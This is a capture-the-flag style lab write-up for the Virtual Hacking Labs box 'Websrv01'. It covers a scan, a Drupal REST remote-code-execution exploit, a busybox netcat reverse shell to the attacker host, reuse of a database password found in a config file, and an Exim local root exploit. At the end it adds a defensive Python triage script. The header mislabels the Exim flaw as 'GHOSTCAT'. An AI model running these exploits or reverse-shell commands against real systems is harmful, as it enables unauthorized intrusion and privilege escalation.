Misc · Medium · Linux

VHL — Websrv01

Food Magazine site on Ubuntu with Exim 4.91 SMTP. Exploited CVE-2019-10149 Exim privilege escalation (GHOSTCAT) for root.

February 16, 2025 · Virtual Hacking Labs

#Exim #CVE-2019-10149 #SMTP #Privilege Escalation

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.2.243
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 17:23 EST
Nmap scan report for 10.11.2.243
Host is up (0.024s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b0:ab:c5:a1:dd:34:e4:97:ed:fa:3b:07:bb:87:f3:ec (RSA)
|   256 01:de:7b:fd:28:85:64:3f:7c:60:b9:6d:4b:c9:97:ea (ECDSA)
|_  256 15:fa:43:0c:15:11:33:4c:7a:07:b4:a8:0c:7e:5a:cc (ED25519)
25/tcp open  smtp    Exim smtpd 4.91
|_ssl-date: TLS randomness does not represent time
| smtp-commands: websrv01 Hello nmap.scanme.org [172.16.1.1], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, STARTTLS, PRDR, HELP
|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
| ssl-cert: Subject: commonName=websrv01/organizationName=Exim Developers/countryName=UK
| Not valid before: 2025-02-16T22:24:13
|_Not valid after:  2025-02-16T23:24:13
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home | Food Magazine
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.29 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: Host: websrv01; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   24.03 ms 10.11.2.243

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.84 seconds
```

80

```sh
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home | Food Magazine
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.29 (Ubuntu)
```

droopescan

```sh
droopescan scan joomla --url http://10.11.2.243/
[+] No version found.

[+] Possible interesting urls found:
    License file. - http://10.11.2.243/LICENSE.txt

[+] Scan finished (0:00:01.071659 elapsed)
```

```sh
feroxbuster --url http://10.11.2.243

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.11.2.243
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       55l      182w     1990c http://10.11.2.243/core/drupalci.yml
200      GET       74l      298w     3619c http://10.11.2.243/core/phpunit.xml.dist
302      GET       12l       22w      360c http://10.11.2.243/user/ => http://10.11.2.243/user/login
403      GET      323l      976w    17818c http://10.11.2.243/user/register
200      GET       19l       53w      390c http://10.11.2.243/core/profiles/minimal/minimal.info.yml
403      GET      323l      976w    17819c http://10.11.2.243/admin
404      GET      323l      978w    17829c http://10.11.2.243/index.php/comment/
404      GET      323l      978w    17819c http://10.11.2.243/comment/
404      GET      323l      978w    17829c http://10.11.2.243/index.php/comment/reply
404      GET      323l      978w    17816c http://10.11.2.243/core/profiles/testing_install_profile_all_dependencies/core/profiles
404      GET      323l      978w    17816c http://10.11.2.243/core/profiles/minimal/core/profiles
404      GET      323l      978w    17816c http://10.11.2.243/core/profiles/minimal/core/
200      GET      477l     1573w    27538c http://10.11.2.243/index.php/filter/tips
200      GET      477l     1573w    27517c http://10.11.2.243/filter/tips
404      GET      323l      978w    17826c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      139l      760w     5889c http://10.11.2.243/README.txt
200      GET       28l      120w      997c http://10.11.2.243/profiles/README.txt
302      GET       12l       22w      364c http://10.11.2.243/search => http://10.11.2.243/search/node
302      GET       12l       22w      404c http://10.11.2.243/index.php/search => http://10.11.2.243/index.php/search/node
404      GET      323l      978w    17816c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      103l      392w     4555c http://10.11.2.243/web.config
302      GET        0l        0w        0c http://10.11.2.243/core/rebuild.php => http://10.11.2.243/
200      GET      463l     2735w    20159c http://10.11.2.243/core/INSTALL.txt
200      GET       42l      240w     1542c http://10.11.2.243/core/INSTALL.sqlite.txt
302      GET       12l       22w      400c http://10.11.2.243/index.php/user/ => http://10.11.2.243/index.php/user/login
200      GET     4713l     6943w   167219c http://10.11.2.243/core/yarn.lock
200      GET      339l     2968w    18002c http://10.11.2.243/core/LICENSE.txt
301      GET        9l       28w      312c http://10.11.2.243/modules => http://10.11.2.243/modules/
301      GET        9l       28w      311c http://10.11.2.243/themes => http://10.11.2.243/themes/
403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      568l     1611w    29861c http://10.11.2.243/index.php/node/
302      GET       12l       22w      360c http://10.11.2.243/user => http://10.11.2.243/user/login
200      GET      568l     1611w    29861c http://10.11.2.243/node/
```

Drupal < 8.6.9 - REST Module Remote Code Execution

  • https://www.exploit-db.com/exploits/46459

```sh
python3 46459.py http://10.11.2.243/ whoami
CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC
 by @leonjza

References:
 https://www.drupal.org/sa-core-2019-003
 https://www.ambionics.io/blog/drupal8-rce

[warning] Caching heavily affects reliability of this exploit.
Nodes are used as they are discovered, but once they are done,
you will have to wait for cache expiry.

Targeting http://10.11.2.243/...
[+] Finding a usable node id...
[x] Node enum found a cached article at: 1, skipping
[+] Using node_id 2
[+] Target appears to be vulnerable!

www-data
```

```sh
python3 46459.py http://10.11.2.243/ 'busybox nc 172.16.1.1 1234 -e bash'
```

```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

```sh
╔══════════╣ Searching passwords in config PHP files
  'password' => 'Drup@lM@nager',
 *     'password' => 'sqlpassword',
 *   'password' => 'sqlpassword',
```

/var/www/html/sites/default/settings.php

```php
$databases['default']['default'] = array (
  'database' => 'drupal8',
  'username' => 'drupalmanager',
  'password' => 'Drup@lM@nager',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'namespace' => 'Drupal\\Core\\Database\\Driver\\mysql',
  'driver' => 'mysql',
);
```

```sh
www-data@websrv01:/home$ su drupalmanager
su drupalmanager
Password: Drup@lM@nager

drupalmanager@websrv01:/home$ whoami
whoami
drupalmanager
```

```sh
ssh drupalmanager@10.11.2.243
```

exim privilege escalation

  • Exim smtpd 4.91
  • https://packetstorm.news/files/id/153312
```sh
drupalmanager@websrv01:~$ ./exim.sh 

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...

Delivering setuid payload...
220 websrv01 ESMTP Exim 4.91 Sun, 16 Feb 2025 23:44:47 +0000
250 websrv01 Hello websrv01 [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1tjoJb-0009V8-Gn
221 websrv01 closing connection

Waiting 5 seconds...
-rwsr-xr-x 1 root drupalmanager 8392 Feb 16 23:44 /tmp/pwned
# whoami
root
# cat /root/key.txt
bgmwgo01xiiinumbb1cd
# date
Sun Feb 16 23:48:25 UTC 2025
#
```
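Two triage checks for this box, written as an added example (not part of the original writeup or of the exploit): one flags an Exim banner such as the `Exim smtpd 4.91` nmap reported as inside the CVE-2019-10149 affected range (4.87 through 4.91, fixed in 4.92), the other recognises the artifact the privilege escalation leaves behind, a root-owned setuid file in a scratch directory like the `/tmp/pwned` line above. Function names and the sample strings are constructed here.

```python
"""Triage helpers: Exim version exposure and leftover setuid payloads.

Added example for the writeup above; the function names are ours and the
sample inputs are constructed from the output shown in the writeup.
"""
import re

# CVE-2019-10149 ("The Return of the WIZard"): default builds of Exim
# 4.87 up to and including 4.91 are affected, 4.92 carries the fix.
# Builds older than 4.87 are affected only with a non-default option, so
# the check below is a banner-level triage, not a full audit.
EXIM_FIRST_AFFECTED = (4, 87)
EXIM_FIXED = (4, 92)

# World-writable locations where a setuid root file has no business being.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def exim_version(banner: str):
    """Return (major, minor) from a banner like 'Exim smtpd 4.91' or the
    SMTP greeting '220 host ESMTP Exim 4.91 ...'; None if no Exim version."""
    m = re.search(r"\bExim\b.*?(\d+)\.(\d+)", banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def exim_affected_cve_2019_10149(banner: str) -> bool:
    """True when the banner's Exim version is in [4.87, 4.92)."""
    v = exim_version(banner)
    return v is not None and EXIM_FIRST_AFFECTED <= v < EXIM_FIXED


def is_setuid_root_in_scratch(ls_line: str) -> bool:
    """True for an `ls -l` line describing a regular file that is setuid,
    owned by root, and located under one of SCRATCH_DIRS, e.g.
    '-rwsr-xr-x 1 root drupalmanager 8392 Feb 16 23:44 /tmp/pwned'."""
    parts = ls_line.split()
    if len(parts) < 9:
        return False                       # not a full long-listing line
    mode, owner, path = parts[0], parts[2], parts[-1]
    is_regular_file = mode[0] == "-"
    setuid_bit = mode[3] in ("s", "S")     # owner-execute slot carries setuid
    return is_regular_file and setuid_bit and owner == "root" \
        and path.startswith(SCRATCH_DIRS)


if __name__ == "__main__":
    print(exim_affected_cve_2019_10149("25/tcp open  smtp    Exim smtpd 4.91"))
    print(is_setuid_root_in_scratch(
        "-rwsr-xr-x 1 root drupalmanager 8392 Feb 16 23:44 /tmp/pwned"))
```

On a live host the second check is the one to schedule: pipe `find /tmp /var/tmp /dev/shm -type f -perm -4000 -exec ls -l {} +` through it and alert on any hit.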